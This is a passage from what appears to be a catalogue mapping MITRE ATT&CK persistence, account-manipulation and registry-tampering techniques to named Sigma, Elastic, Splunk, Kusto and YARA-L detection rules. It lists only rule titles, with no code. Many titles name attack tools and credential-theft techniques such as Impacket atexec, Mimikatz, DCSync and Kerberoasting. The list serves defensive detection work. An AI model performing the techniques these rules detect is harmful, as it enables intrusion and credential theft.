- Sigma Abuse of Service Permissions to Hide Services Via Set-Service test
- Sigma Abuse of Service Permissions to Hide Services Via Set-Service - PS test
- Sigma Changing Existing Service ImagePath Value Via Reg.EXE test
- Elastic Persistence via Update Orchestrator Service Hijack production
- Sigma Possible Privilege Escalation via Weak Service Permissions test
- Sigma Potential Persistence Attempt Via Existing Service Tampering test
- Elastic Potential Privilege Escalation via Service ImagePath Modification production
- Sigma Potential Privilege Escalation via Service Permissions Weakness test
- Splunk Reg exe Manipulating Windows Services Registry Keys production
- Sigma Service DACL Abuse To Hide Services Via Sc.EXE test
- Sigma Service Registry Key Read Access Request test
- Sigma Service Registry Permissions Weakness Check test
- Sigma Service Security Descriptor Tampering Via Sc.EXE test
- Sigma Suspicious Service DACL Modification Via Set-Service Cmdlet - PS test
- Elastic Unsigned DLL Loaded by Svchost production
- Elastic Unusual Persistence via Services Registry production
- Splunk Windows Service Creation Using Registry Entry production
Persistence
Boot or Logon Initialization Scripts T1037 10 rules
- Splunk Logon Script Event Trigger Execution production
- Splunk Logon Script Registry Key added (EDR)
- Splunk Logon Script Registry Key added (PowerShell)
- Splunk Logon Script Registry Key added (Sysmon)
- Splunk Logon Script Registry Key added (Windows Event Log)
- Sigma Potential Persistence Via Logon Scripts - CommandLine test
- Sigma Potential Persistence Via Logon Scripts - Registry test
- Elastic Startup/Logon Script added to Group Policy Object production
- Elastic Uncommon Registry Persistence Change production
- Sigma Uncommon Userinit Child Process test
Boot or Logon Initialization Scripts: Logon Script (Windows) T1037.001 8 rules
- Splunk Logon Script Event Trigger Execution production
- Splunk Logon Script Registry Key added (EDR)
- Splunk Logon Script Registry Key added (PowerShell)
- Splunk Logon Script Registry Key added (Sysmon)
- Splunk Logon Script Registry Key added (Windows Event Log)
- Sigma Potential Persistence Via Logon Scripts - CommandLine test
- Sigma Potential Persistence Via Logon Scripts - Registry test
- Sigma Uncommon Userinit Child Process test
Scheduled Task/Job T1053 133 rules
- Elastic A scheduled task was created production
- Elastic At.exe Command Lateral Movement production
- Kusto AV detections related to Tarrask malware available
- Sigma ChromeLoader Malware Execution test
- Splunk Create_Modify Schtasks (PowerShell)
- Splunk Create_Modify Schtasks (Sysmon)
- Splunk Create_Modify Schtasks (Windows Event Log)
- Sigma Defrag Deactivation test
- Sigma Defrag Deactivation - Security test
- Sigma Diamond Sleet APT Scheduled Task Creation test
- Sigma Fortinet APT group abuse on Windows (task) experimental
- Sigma HackTool - CrackMapExec Execution test
- Sigma HackTool - CrackMapExec Execution Patterns stable
- Sigma HackTool - Default PowerSploit/Empire Scheduled Task Creation test
- Sigma HackTool - SharPersist Execution test
- Sigma HAFNIUM Exchange Exploitation Activity test
- Splunk Hidden Scheduled Task Created - Windows (Windows Event Log)
- Splunk Impacket atexec.py Execution (PowerShell)
- Splunk Impacket atexec.py Execution (Sysmon)
- Splunk Impacket atexec.py Execution (Windows Event Log)
- Splunk Impacket atexec.py Scheduled Task Creation (Windows Event Log)
- Splunk Impacket atexec.py Temp File Creation (Sysmon)
- Splunk Impacket atexec.py Temp File Creation (Windows Event Log)
- Sigma Important Scheduled Task Deleted/Disabled test
- Sigma Interactive AT Job test
- Sigma Interactive privileged shell triggered by schedule task (deprecated) experimental
- Sigma Kapeka Backdoor Persistence Activity test
- Sigma Kapeka Backdoor Scheduled Task Creation test
- Elastic Local Scheduled Task Creation production
- Sigma Massive remote schedule task creation via named pipes (CrackMapExec with ATexec) experimental
- YARA-L MITRE ATT&CK T1053.005 Windows Creation Of Scheduled Task
- Sigma OilRig APT Activity test
- Sigma OilRig APT Registry Persistence test
- Sigma OilRig APT Schedule Task Persistence - Security test
- Sigma OilRig APT Schedule Task Persistence - System test
- Sigma Operation Wocao Activity test
- Sigma Operation Wocao Activity - Security test
- Elastic Outbound Scheduled Task Activity via PowerShell production
- Sigma Persistence and Execution at Scale via GPO Scheduled Task test
- Elastic Persistence via a Windows Installer production
- Kusto Persistence Via Scheduled Tasks
- Elastic Persistence via TelemetryController Scheduled Task Hijack production
- Splunk Possible Lateral Movement PowerShell Spawn production
- Sigma Potential ACTINIUM Persistence Activity test
- Sigma Potential BearLPE Exploitation test
- Sigma Potential Persistence Via Microsoft Compatibility Appraiser test
- Sigma Potential Persistence Via Powershell Search Order Hijacking - Task test
- Sigma Potential Registry Persistence Attempt Via Windows Telemetry test
- Sigma Potential SSH Tunnel Persistence Install Using A Scheduled Task experimental
- Sigma Powershell Create Scheduled Task test
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Splunk Randomly Generated Scheduled Task Name experimental
- Splunk Rare Schedule Task Created (Windows Event Log)
- Splunk Rare Scheduled Task (Windows Event Log)
- Sigma Remote schedule task creation via named pipes (ATexec) experimental
- Elastic Remote Scheduled Task Creation production
- Elastic Remote Scheduled Task Creation via RPC production
- Sigma Remote Task Creation via ATSVC Named Pipe test
- Sigma Renamed Schtasks Execution experimental
- Sigma Schedule Task Creation From Env Variable Or Potentially Suspicious Path Via Schtasks.EXE test
- Splunk Schedule Task with HTTP Command Arguments production
- Splunk Schedule Task with Rundll32 Command Trigger production
- Sigma Scheduled persistent task with SYSTEM privileges creation experimental
- Sigma Scheduled Task Created - FileCreation test
- Sigma Scheduled Task Created - Registry test
- Sigma Scheduled task created and deleted fastly (ATexec.py) experimental
- Elastic Scheduled Task Created by a Windows Script production
- Sigma Scheduled Task Creation From Potential Suspicious Parent Location test
- Sigma Scheduled Task Creation Masquerading as System Processes experimental
- Splunk Scheduled Task Creation on Remote Endpoint using At production
- Sigma Scheduled Task Creation Via Schtasks.EXE test
- Sigma Scheduled task creation with command line experimental
- Sigma Scheduled Task Creation with Curl and PowerShell Execution Combo experimental
- Splunk Scheduled Task Deleted Or Created via CMD production
- Sigma Scheduled Task Deletion test
- Sigma Scheduled Task Executed From A Suspicious Location test
- Sigma Scheduled Task Executed Uncommon LOLBIN test
- Sigma Scheduled Task Executing Encoded Payload from Registry test
- Sigma Scheduled Task Executing Payload from Registry test
- Elastic Scheduled Task Execution at Scale via GPO production
- Splunk Scheduled Task Initiation on Remote Endpoint production
- Splunk Scheduled Task with Potential SSH Tunnel - Windows (PowerShell)
- Splunk Scheduled Task with Potential SSH Tunnel - Windows (Sysmon)
- Splunk Scheduled Task with Potential SSH Tunnel - Windows (Windows Event Log)
- Sigma Scheduled TaskCache Change by Uncommon Program test
- Elastic Scheduled Tasks AT Command Enabled production
- Sigma Schtasks Creation Or Modification With SYSTEM Privileges test
- Sigma Schtasks From Suspicious Folders test
- Splunk Schtasks Run Task On Demand production
- Splunk Schtasks scheduling job on remote system production
- Splunk Schtasks used for forcing a reboot production
- Sigma Serpent Backdoor Payload Execution Via Scheduled Task test
- Splunk Short Lived Scheduled Task production
- Sigma Suspicious Command Patterns In Scheduled Task Creation test
- Elastic Suspicious Execution via Scheduled Task production
- Sigma Suspicious Modification Of Scheduled Tasks test
- Sigma Suspicious Scheduled Task Creation test
- Sigma Suspicious Scheduled Task Creation Involving Temp Folder test
- Sigma Suspicious Scheduled Task Creation via Masqueraded XML File test
- Splunk Suspicious Scheduled Task from Public Directory production
- Sigma Suspicious Scheduled Task Name As GUID test
- Sigma Suspicious Scheduled Task Update test
- Sigma Suspicious Scheduled Task Write to System32 Tasks test
- Sigma Suspicious Schtasks Execution AppData Folder test
- Sigma Suspicious Schtasks Schedule Type With High Privileges test
- Sigma Suspicious Schtasks Schedule Types test
- Elastic Suspicious ScreenConnect Client Child Process production
- Splunk Svchost LOLBAS Execution Process Spawn production
- Sigma Task Scheduler DLL Loaded By Application Located In Potentially Suspicious Location test
- Elastic Temporarily Scheduled Task Creation production
- Sigma Turla Group Commands May 2020 test
- Elastic UAC Bypass via DiskCleanup Scheduled Task Hijack production
- Sigma Uncommon One Time Only Scheduled Task At 00:00 test
- Elastic Unusual Scheduled Task Update production
- Splunk Windows Compatibility Telemetry Suspicious Child Process production
- Splunk Windows Compatibility Telemetry Tampering Through Registry production
- Splunk Windows Enable Win32 ScheduledJob via Registry production
- Splunk Windows Hidden Schedule Task Settings production
- Splunk Windows Level RMM Watchdog Task Created production
- Splunk Windows PowerShell ScheduleTask production
- Splunk Windows Registry Delete Task SD production
- Splunk Windows Scheduled Task Created in a Group Policy Object production
- Splunk Windows Scheduled Task Created Via XML production
- Splunk Windows Scheduled Task DLL Module Loaded production
- Splunk Windows Scheduled Task Service Spawned Shell production
- Splunk Windows Scheduled Task with Highest Privileges production
- Splunk Windows Scheduled Task with Suspicious Command production
- Splunk Windows Scheduled Task with Suspicious Name production
- Splunk Windows Scheduled Tasks for CompMgmtLauncher or Eventvwr production
- Splunk Windows Schtasks Create Run As System production
- Splunk WinEvent Scheduled Task Created to Spawn Shell production
- Splunk WinEvent Scheduled Task Created Within Public Path production
- Splunk WinEvent Windows Task Scheduler Event Action Started production
Scheduled Task/Job: At T1053.002 5 rules
- Elastic At.exe Command Lateral Movement production
- Sigma Interactive AT Job test
- Sigma Remote Task Creation via ATSVC Named Pipe test
- Splunk Scheduled Task Creation on Remote Endpoint using At production
- Elastic Scheduled Tasks AT Command Enabled production
Scheduled Task/Job: Scheduled Task T1053.005 111 rules
- Elastic A scheduled task was created production
- Elastic At.exe Command Lateral Movement production
- Sigma ChromeLoader Malware Execution test
- Splunk Create_Modify Schtasks (PowerShell)
- Splunk Create_Modify Schtasks (Sysmon)
- Splunk Create_Modify Schtasks (Windows Event Log)
- Sigma Defrag Deactivation test
- Sigma Diamond Sleet APT Scheduled Task Creation test
- Sigma Fortinet APT group abuse on Windows (task) experimental
- Sigma HackTool - Default PowerSploit/Empire Scheduled Task Creation test
- Splunk Impacket atexec.py Execution (PowerShell)
- Splunk Impacket atexec.py Execution (Sysmon)
- Splunk Impacket atexec.py Execution (Windows Event Log)
- Splunk Impacket atexec.py Scheduled Task Creation (Windows Event Log)
- Splunk Impacket atexec.py Temp File Creation (Sysmon)
- Splunk Impacket atexec.py Temp File Creation (Windows Event Log)
- Sigma Important Scheduled Task Deleted/Disabled test
- Sigma Interactive privileged shell triggered by schedule task (deprecated) experimental
- Sigma Kapeka Backdoor Persistence Activity test
- Sigma Kapeka Backdoor Scheduled Task Creation test
- Elastic Local Scheduled Task Creation production
- Sigma Massive remote schedule task creation via named pipes (CrackMapExec with ATexec) experimental
- YARA-L MITRE ATT&CK T1053.005 Windows Creation Of Scheduled Task
- Sigma OilRig APT Activity test
- Sigma OilRig APT Registry Persistence test
- Sigma OilRig APT Schedule Task Persistence - Security test
- Sigma OilRig APT Schedule Task Persistence - System test
- Sigma Operation Wocao Activity test
- Sigma Operation Wocao Activity - Security test
- Elastic Outbound Scheduled Task Activity via PowerShell production
- Sigma Persistence and Execution at Scale via GPO Scheduled Task test
- Elastic Persistence via a Windows Installer production
- Kusto Persistence Via Scheduled Tasks
- Elastic Persistence via TelemetryController Scheduled Task Hijack production
- Splunk Possible Lateral Movement PowerShell Spawn production
- Sigma Potential ACTINIUM Persistence Activity test
- Sigma Potential BearLPE Exploitation test
- Sigma Potential Persistence Via Microsoft Compatibility Appraiser test
- Sigma Potential Persistence Via Powershell Search Order Hijacking - Task test
- Sigma Potential Registry Persistence Attempt Via Windows Telemetry test
- Sigma Potential SSH Tunnel Persistence Install Using A Scheduled Task experimental
- Sigma Powershell Create Scheduled Task test
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Splunk Randomly Generated Scheduled Task Name experimental
- Splunk Rare Schedule Task Created (Windows Event Log)
- Splunk Rare Scheduled Task (Windows Event Log)
- Sigma Remote schedule task creation via named pipes (ATexec) experimental
- Elastic Remote Scheduled Task Creation production
- Elastic Remote Scheduled Task Creation via RPC production
- Sigma Renamed Schtasks Execution experimental
- Sigma Schedule Task Creation From Env Variable Or Potentially Suspicious Path Via Schtasks.EXE test
- Sigma Scheduled persistent task with SYSTEM privileges creation experimental
- Sigma Scheduled Task Created - FileCreation test
- Sigma Scheduled Task Created - Registry test
- Sigma Scheduled task created and deleted fastly (ATexec.py) experimental
- Elastic Scheduled Task Created by a Windows Script production
- Sigma Scheduled Task Creation From Potential Suspicious Parent Location test
- Sigma Scheduled Task Creation Masquerading as System Processes experimental
- Sigma Scheduled Task Creation Via Schtasks.EXE test
- Sigma Scheduled task creation with command line experimental
- Sigma Scheduled Task Creation with Curl and PowerShell Execution Combo experimental
- Splunk Scheduled Task Deleted Or Created via CMD production
- Sigma Scheduled Task Deletion test
- Sigma Scheduled Task Executed From A Suspicious Location test
- Sigma Scheduled Task Executed Uncommon LOLBIN test
- Sigma Scheduled Task Executing Encoded Payload from Registry test
- Sigma Scheduled Task Executing Payload from Registry test
- Elastic Scheduled Task Execution at Scale via GPO production
- Splunk Scheduled Task Initiation on Remote Endpoint production
- Sigma Scheduled TaskCache Change by Uncommon Program test
- Sigma Schtasks Creation Or Modification With SYSTEM Privileges test
- Sigma Schtasks From Suspicious Folders test
- Splunk Schtasks scheduling job on remote system production
- Splunk Schtasks used for forcing a reboot production
- Sigma Serpent Backdoor Payload Execution Via Scheduled Task test
- Splunk Short Lived Scheduled Task production
- Sigma Suspicious Command Patterns In Scheduled Task Creation test
- Elastic Suspicious Execution via Scheduled Task production
- Sigma Suspicious Modification Of Scheduled Tasks test
- Sigma Suspicious Scheduled Task Creation test
- Sigma Suspicious Scheduled Task Creation Involving Temp Folder test
- Sigma Suspicious Scheduled Task Creation via Masqueraded XML File test
- Splunk Suspicious Scheduled Task from Public Directory production
- Sigma Suspicious Scheduled Task Name As GUID test
- Sigma Suspicious Scheduled Task Update test
- Sigma Suspicious Schtasks Execution AppData Folder test
- Sigma Suspicious Schtasks Schedule Type With High Privileges test
- Sigma Suspicious Schtasks Schedule Types test
- Elastic Suspicious ScreenConnect Client Child Process production
- Splunk Svchost LOLBAS Execution Process Spawn production
- Sigma Task Scheduler DLL Loaded By Application Located In Potentially Suspicious Location test
- Elastic Temporarily Scheduled Task Creation production
- Sigma Turla Group Commands May 2020 test
- Elastic UAC Bypass via DiskCleanup Scheduled Task Hijack production
- Sigma Uncommon One Time Only Scheduled Task At 00:00 test
- Elastic Unusual Scheduled Task Update production
- Splunk Windows Compatibility Telemetry Suspicious Child Process production
- Splunk Windows Compatibility Telemetry Tampering Through Registry production
- Splunk Windows Enable Win32 ScheduledJob via Registry production
- Splunk Windows PowerShell ScheduleTask production
- Splunk Windows Registry Delete Task SD production
- Splunk Windows Scheduled Task Created in a Group Policy Object production
- Splunk Windows Scheduled Task Created Via XML production
- Splunk Windows Scheduled Task Service Spawned Shell production
- Splunk Windows Scheduled Task with Highest Privileges production
- Splunk Windows Scheduled Task with Suspicious Command production
- Splunk Windows Scheduled Task with Suspicious Name production
- Splunk Windows Schtasks Create Run As System production
- Splunk WinEvent Scheduled Task Created to Spawn Shell production
- Splunk WinEvent Scheduled Task Created Within Public Path production
- Splunk WinEvent Windows Task Scheduler Event Action Started production
Valid Accounts T1078 67 rules
- Elastic Access to a Sensitive LDAP Attribute production
- Kusto Account added and removed from privileged groups
- Elastic Account Discovery Command via SYSTEM Account production
- Sigma Account renamed to admin (or likely) account to evade defense experimental
- Splunk Account set to active via Net.exe (EDR)
- Splunk Account set to active via Net.exe (Sysmon)
- Splunk Account set to active via Net.exe (Windows Event Log)
- Sigma Account Tampering - Suspicious Failed Logon Reasons test
- Sigma Admin User Remote Logon test
- Elastic AdminSDHolder Backdoor production
- Kusto AdminSDHolder Modifications
- Elastic AdminSDHolder SDProp Exclusion Added production
- Sigma Azure Windows virtual machine login via serial console experimental
- Sigma Commvault QLogin with PublicSharingUser and GUID Password (CVE-2025-57788) experimental
- Elastic Delegated Managed Service Account Modification by an Unusual User production
- Elastic dMSA Account Creation by an Unusual User production
- Sigma DMSA Link Attributes Modified experimental
- Sigma DMSA Service Account Created in Specific OUs - PowerShell experimental
- Kusto EatonForeseer - Unauthorized Logins available
- Kusto Email access via active sync
- Sigma External Remote RDP Logon from Public IP test
- Sigma External Remote SMB Logon from Public IP test
- Sigma Failed Logon From Public IP test
- Elastic First Time Seen Account Performing DCSync production
- Kusto Group created then added to built in domain local or global group
- Elastic Kerberos Pre-authentication Disabled for User production
- Sigma Lateral movement detection (based on "special groups" feature) experimental
- Elastic Mounting Hidden or WebDav Remote Shares production
- Splunk Multiple Host logons (Windows Event Log)
- Kusto Multiple Password Reset by user
- Sigma Network login performed to multiple targets experimental
- Sigma New DMSA Service Account Created in Specific OUs experimental
- Kusto New user created and added to the built-in administrators group
- Sigma Password Provided In Command Line Of Net.EXE test
- Elastic Potential Account Takeover - Logon from New Source IP production
- Elastic Potential Account Takeover - Mixed Logon Types production
- Elastic Potential Credential Access via DCSync production
- Elastic Potential Privileged Escalation via SamAccountName Spoofing production
- Elastic Remote Computer Account DnsHostName Update production
- Splunk Rubeus Password Change (Windows Event Log)
- Splunk Short Lived Windows Accounts production
- Kusto Sign-ins from IPs that attempt sign-ins to disabled accounts (Uses Authentication Normalization)
- Sigma Success login attempt on a Windows OpenSSH server experimental
- Splunk Suspicious Computer Account Name Change production
- Sigma Suspicious Computer Machine Password by PowerShell test
- Splunk Suspicious Kerberos Service Ticket Request production
- Sigma Suspicious Remote Logon with Explicit Credentials test
- Splunk Suspicious Ticket Granting Ticket Request production
- Splunk Unusual Number of Computer Service Tickets Requested experimental
- Splunk Unusual Number of Remote Endpoint Authentication Events experimental
- Kusto User account added to built in domain local or global group
- Kusto User account created and deleted within 10 mins
- Kusto User account enabled and disabled within 10 mins
- Sigma User Added to Local Administrator Group stable
- Kusto User login from different countries within 3 hours (Uses Authentication Normalization)
- Splunk Windows Azure PowerShell Module Installation Via PowerShell Script production
- Splunk Windows ConvertTo-AADIntBackdoor Execution Via PowerShell Script production
- Splunk Windows Entra User Management Via Azure CLI production
- Splunk Windows Group Policy Object Created production
- Splunk Windows Guest Account Enabled Via Net.EXE production
- Splunk Windows Large Number of Computer Service Tickets Requested production
- Splunk Windows Multiple Account Passwords Changed production
- Splunk Windows Multiple Accounts Deleted production
- Splunk Windows Multiple Accounts Disabled production
- Splunk Windows PowerView AD Access Control List Enumeration production
- Splunk WMIC Explicit Credentials (Sysmon)
- Splunk WMIC Explicit Credentials (Windows Event Log)
Valid Accounts: Default Accounts T1078.001 6 rules
- Splunk Account set to active via Net.exe (EDR)
- Splunk Account set to active via Net.exe (Sysmon)
- Splunk Account set to active via Net.exe (Windows Event Log)
- Sigma Admin User Remote Logon test
- Sigma Commvault QLogin with PublicSharingUser and GUID Password (CVE-2025-57788) experimental
- Splunk Windows Guest Account Enabled Via Net.EXE production
Valid Accounts: Domain Accounts T1078.002 20 rules
- Elastic Access to a Sensitive LDAP Attribute production
- Sigma Account renamed to admin (or likely) account to evade defense experimental
- Sigma Admin User Remote Logon test
- Elastic AdminSDHolder Backdoor production
- Elastic AdminSDHolder SDProp Exclusion Added production
- Elastic Delegated Managed Service Account Modification by an Unusual User production
- Elastic dMSA Account Creation by an Unusual User production
- Sigma DMSA Link Attributes Modified experimental
- Sigma DMSA Service Account Created in Specific OUs - PowerShell experimental
- Elastic First Time Seen Account Performing DCSync production
- Elastic Kerberos Pre-authentication Disabled for User production
- Sigma New DMSA Service Account Created in Specific OUs experimental
- Elastic Potential Credential Access via DCSync production
- Elastic Potential Privileged Escalation via SamAccountName Spoofing production
- Elastic Remote Computer Account DnsHostName Update production
- Splunk Suspicious Computer Account Name Change production
- Splunk Suspicious Kerberos Service Ticket Request production
- Splunk Suspicious Ticket Granting Ticket Request production
- Splunk Windows Group Policy Object Created production
- Splunk Windows PowerView AD Access Control List Enumeration production
Valid Accounts: Local Accounts T1078.003 4 rules
- Elastic Account Discovery Command via SYSTEM Account production
- Sigma Admin User Remote Logon test
- Elastic Mounting Hidden or WebDav Remote Shares production
- Splunk Short Lived Windows Accounts production
Valid Accounts: Cloud Accounts T1078.004 1 rule
- Splunk Windows Entra User Management Via Azure CLI production
Account Manipulation T1098 113 rules
- Sigma A Member Was Added to a Security-Enabled Global Group stable
- Sigma A Member Was Removed From a Security-Enabled Global Group stable
- Sigma A New Trust Was Created To A Domain stable
- Sigma A Security-Enabled Global Group Was Deleted stable
- Kusto Account added and removed from privileged groups
- Elastic Account Configured with Never-Expiring Password production
- Sigma Account marked as sensitive and cannot be delegated had its protection removed (weakness introduction) experimental
- Elastic Account Password Reset Remotely production
- Sigma Account password set to never expire. experimental
- Splunk Account set to active via Net.exe (EDR)
- Splunk Account set to active via Net.exe (Sysmon)
- Splunk Account set to active via Net.exe (Windows Event Log)
- Sigma Account set with Kerberos DES encryption activated (weakness introduction) experimental
- Sigma Account set with Kerberos pre-authentication not required (AS-REP Roasting) experimental
- Sigma Account set with password not required (weakness introduction) experimental
- Sigma Account set with reversible encryption (weakness introduction) experimental
- Elastic Active Directory Group Modification by SYSTEM production
- Sigma Active Directory User Backdoors test
- Kusto AD account with Don't Expire Password
- Kusto AD user enabled and password not set within 48 hours available
- Elastic AdminSDHolder Backdoor production
- Elastic AdminSDHolder SDProp Exclusion Added production
- Sigma Computer account created with privileges experimental
- Sigma Computer account manipulation for delegation (RBCD) experimental
- Sigma Computer account renamed without a trailing $ (CVE-2021-42278/42287) experimental
- Splunk Create_Add Local_Domain User (EDR)
- Splunk Create_Add Local_Domain User (Sysmon)
- Splunk Create_Add Local_Domain User (Windows Event Log)
- Elastic Delegated Managed Service Account Modification by an Unusual User production
- Kusto DEV-0270 New User Creation available
- Sigma Disabled guest or builtin account activated experimental
- Sigma Disabled guest or builtin account activated (command)
- Elastic dMSA Account Creation by an Unusual User production
- Sigma DMSA Link Attributes Modified experimental
- Sigma DMSA Service Account Created in Specific OUs - PowerShell experimental
- Sigma Domain group membership change experimental
- Kusto DSRM Account Abuse
- Sigma DSRM password changed (native) experimental
- Sigma DSRM password changed (Reg via command) experimental
- Sigma DSRM password changed (Reg via PowerShell) experimental
- Sigma Enabled User Right in AD to Control User Objects test
- Kusto Group created then added to built in domain local or global group
- Sigma Hidden account creation (with fast deletion) experimental
- Sigma High risk Active Directory group membership change experimental
- Sigma High risk local/domain local group membership change experimental
- Sigma Host constrained delegation settings changed for potential abuse (Rubeus) - Any protocol experimental
- Sigma Host constrained delegation settings changed for potential abuse (Rubeus) - Kerberos only experimental
- Sigma Host set with constrained delegation experimental
- Sigma Host set with unconstrained delegation experimental
- Sigma Host unconstrained delegation settings changed for potential abuse (Rubeus) experimental
- Elastic Kerberos Pre-authentication Disabled for User production
- Elastic KRBTGT Delegation Backdoor production
- Kusto Local Admin Group Changes available
- Sigma Local group membership change experimental
- Sigma Medium risk Active Directory group membership change experimental
- Sigma Medium risk local/domain local group membership change experimental
- Sigma Member added to DNSadmin group experimental
- Splunk Member added to security-enabled global group (Windows Event Log)
- Elastic Modification of the msPKIAccountCredentials production
- Elastic New ActiveSyncAllowedDeviceID Added via PowerShell production
- Sigma New DMSA Service Account Created in Specific OUs experimental
- Sigma New member added to a "OCS/Lync/Skype for Business" administration group (low risk) experimental
- Sigma New member added to a "OCS/Lync/Skype for Business" administration group (medium risk) experimental
- Sigma New member added to an "OCS/Lync/Skype for Business" administration group (high risk) experimental
- Sigma New member added to an Exchange administration group (high risk) experimental
- Sigma New member added to an Exchange administration group (medium risk) experimental
- Kusto New user created and added to the built-in administrators group
- Sigma Password Change on Directory Service Restore Mode (DSRM) Account stable
- Sigma Password Set to Never Expire via WMI experimental
- Elastic Potential Active Directory Replication Account Backdoor production
- Elastic Potential Privileged Escalation via SamAccountName Spoofing production
- Elastic Potential Shadow Credentials added to AD Object production
- Sigma Powershell LocalAccount Manipulation test
- Sigma Powerview Add-DomainObjectAcl DCSync AD Extend Right test
- Sigma Privilege SeMachineAccountPrivilege abuse experimental
- Elastic Sensitive Privilege SeEnableDelegationPrivilege assigned to a Principal production
- Kusto Shadow Credentials Added to Account
- Kusto Shadow Credentials Added to Account (Alternative)
- Kusto Sign-ins from IPs that attempt sign-ins to disabled accounts (Uses Authentication Normalization)
- Sigma SPN added to an account by command line experimental
- Sigma Suspicious Computer Account Name Change CVE-2021-42287 test
- Sigma Suspicious modification of a computer account SPN experimental
- Sigma Suspicious modification of a fake domain controller SPN (DCshadow) experimental
- Sigma Suspicious modification of a fake domain controller SPN (DCshadow) (Directory Services) experimental
- Sigma Suspicious modification of a user account SPN to enable Kerberoast attack experimental
- Kusto User account added to built in domain local or global group
- Kusto User account created and deleted within 10 mins
- Sigma User account creation disguised in a computer account experimental
- Kusto User account enabled and disabled within 10 mins
- Elastic User account exposed to Kerberoasting production
- Sigma User added to a group via commandline
- Sigma User Added To Highly Privileged Group test
- Sigma User Added to Local Administrator Group stable
- Sigma User Added to Local Administrators Group test
- Elastic User Added to Privileged Group in Active Directory production
- Sigma User password change using current hash password - ChangeNTLM (Mimikatz) experimental
- Sigma User password change without previous password known - SetNTLM (Mimikatz) experimental
- Splunk Windows AD add Self to Group production
- Splunk Windows AD DSRM Account Changes production
- Splunk Windows AD DSRM Password Reset production
- Splunk Windows AD Privileged Group Modification production
- Splunk Windows AD Self DACL Assignment production
- Splunk Windows AD ServicePrincipalName Added To Domain Account production
- Splunk Windows AD Short Lived Domain Account ServicePrincipalName production
- Splunk Windows Azure PowerShell Module Installation Via PowerShell Script production
- Splunk Windows DnsAdmins New Member Added production
- Splunk Windows Entra User Management Via Azure CLI production
- Splunk Windows Increase in Group or Object Modification Activity production
- Splunk Windows Increase in User Modification Activity production
- Splunk Windows Multiple Account Passwords Changed production
- Splunk Windows Multiple Accounts Deleted production
- Splunk Windows Multiple Accounts Disabled production
- Elastic WRITEDAC Access on Active Directory Object production
Account Manipulation: Additional Email Delegate Permissions T1098.002 1 rule
- Elastic New ActiveSyncAllowedDeviceID Added via PowerShell production
Account Manipulation: Additional Local or Domain Groups T1098.007 1 rule
- Elastic User Added to Privileged Group in Active Directory production
Modify Registry T1112 251 rules
- Sigma Activate Suppression of Windows Security Center Notifications test
- Sigma Add DisallowRun Execution to Registry test
- Sigma Allow RDP Remote Assistance Feature test
- Sigma Backdoor introduction via registry permission change through WMI (DAMP) experimental
- Sigma Blackbyte Ransomware Registry test
- YARA-L Blackbyte Ransomware Registry
- Sigma Blue Mockingbird test
- Sigma Blue Mockingbird - Registry test
- Sigma Change the Fax Dll test
- Sigma Change User Account Associated with the FAX Service test
- Sigma ClickOnce Trust Prompt Tampering test
- Elastic Code Signing Policy Modification Through Registry production
- Elastic Component Object Model Hijacking production
- Sigma CrashControl CrashDump Disabled test
- Sigma CVE-2020-1048 Exploitation Attempt - Suspicious New Printer Ports - Registry test
- Splunk Defender Registry Values Modified (Sysmon)
- Splunk Defender Registry Values Modified (Windows Event Log)
- Elastic Deprecated - Encoded Executable Stored in the Registry production
- Kusto Detect Registry Run Key Creation/Modification available
- Sigma DHCP Callout DLL Installation test
- Sigma Disable Internal Tools or Feature in Registry test
- YARA-L Disable Internal Tools or Feature in Registry
- Splunk Disable Registry Tool production
- Sigma Disable Security Events Logging Adding Reg Key MiniNt test
- Splunk Disable Security Logs Using MiniNt Registry production
- Splunk Disable Show Hidden Files production
- Splunk Disable Windows App Hotkeys production
- Sigma Disable Windows Security Center Notifications test
- Splunk Disabling CMD Application production
- Splunk Disabling ControlPanel production
- Elastic Disabling Lsa Protection via Registry Modification production
- Splunk Disabling NoRun Windows App production
- Elastic Disabling User Account Control via Registry Modification production
- Elastic DNS Global Query Block List Modified or Disabled production
- Sigma DNS-over-HTTPS Enabled by Registry test
- Elastic DNS-over-HTTPS Enabled via Registry production
- Sigma Enable LM Hash Storage test
- Sigma Enable LM Hash Storage - ProcCreation test
- Splunk Enable WDigest UseLogonCredential Registry production
- Sigma ETW Logging Disabled For rpcrt4.dll test
- Sigma ETW Logging Disabled For SCM test
- Sigma ETW Logging Disabled In .NET Processes - Registry test
- Sigma ETW Logging Disabled In .NET Processes - Sysmon Registry test
- Elastic File or Directory Deletion Command production
- Sigma FlowCloud Registry Markers test
- Splunk FodHelper UAC Bypass production
- Elastic Full User-Mode Dumps Enabled System-Wide production
- Splunk HTTP_HTTPS Default Security Zone Modified to Local Machine (PowerShell)
- Splunk HTTP_HTTPS Default Security Zone Modified to Local Machine (Windows Event Log)
- Elastic Image File Execution Options Injection production
- Sigma Impacket SMBexec service creation (registry) experimental
- Sigma Impacket SMBexec service registration (native) experimental
- Sigma Imports Registry Key From a File test
- Sigma Imports Registry Key From an ADS test
- Elastic Installation of Security Support Provider production
- Elastic Local Account TokenFilter Policy Disabled production
- Splunk LocalAccountTokenFilterPolicy Registry Value Modified (PowerShell)
- Splunk LocalAccountTokenFilterPolicy Registry Value Modified (Sysmon)
- Splunk LocalAccountTokenFilterPolicy Registry Value Modified (Windows Event Log)
- Sigma Macro Enabled In A Potentially Suspicious Document test
- Splunk Malicious InProcServer32 Modification production
- Sigma Microsoft Office Trusted Location Updated test
- Elastic Microsoft Windows Defender Tampering production
- Elastic Modification of AmsiEnable Registry Key production
- Sigma Modification of IE Registry Settings test
- Elastic Modification of WDigest Security Provider production
- Splunk Modify Registry Key (Windows Event Log)
- Elastic MS Office Macro Security Registry Modifications production
- Sigma NET NGenAssemblyUsageLog Registry Key Tamper test
- Sigma NetNTLM Downgrade Attack test
- Sigma NetNTLM Downgrade Attack - Registry test
- Elastic Netsh Helper DLL production
- Elastic Network-Level Authentication (NLA) Disabled production
- Sigma New BgInfo.EXE Custom DB Path Registry Configuration test
- Sigma New BgInfo.EXE Custom VBScript Registry Configuration test
- Sigma New BgInfo.EXE Custom WMI Query Registry Configuration test
- Sigma New DNS ServerLevelPluginDll Installed test
- Sigma New DNS ServerLevelPluginDll Installed Via Dnscmd.EXE test
- Sigma Non-privileged Usage of Reg or Powershell test
- Elastic NullSessionPipe Registry Modification production
- Sigma OceanLotus Registry Activity test
- Sigma Office Macros Warning Disabled test
- Elastic Office Test Registry Persistence production
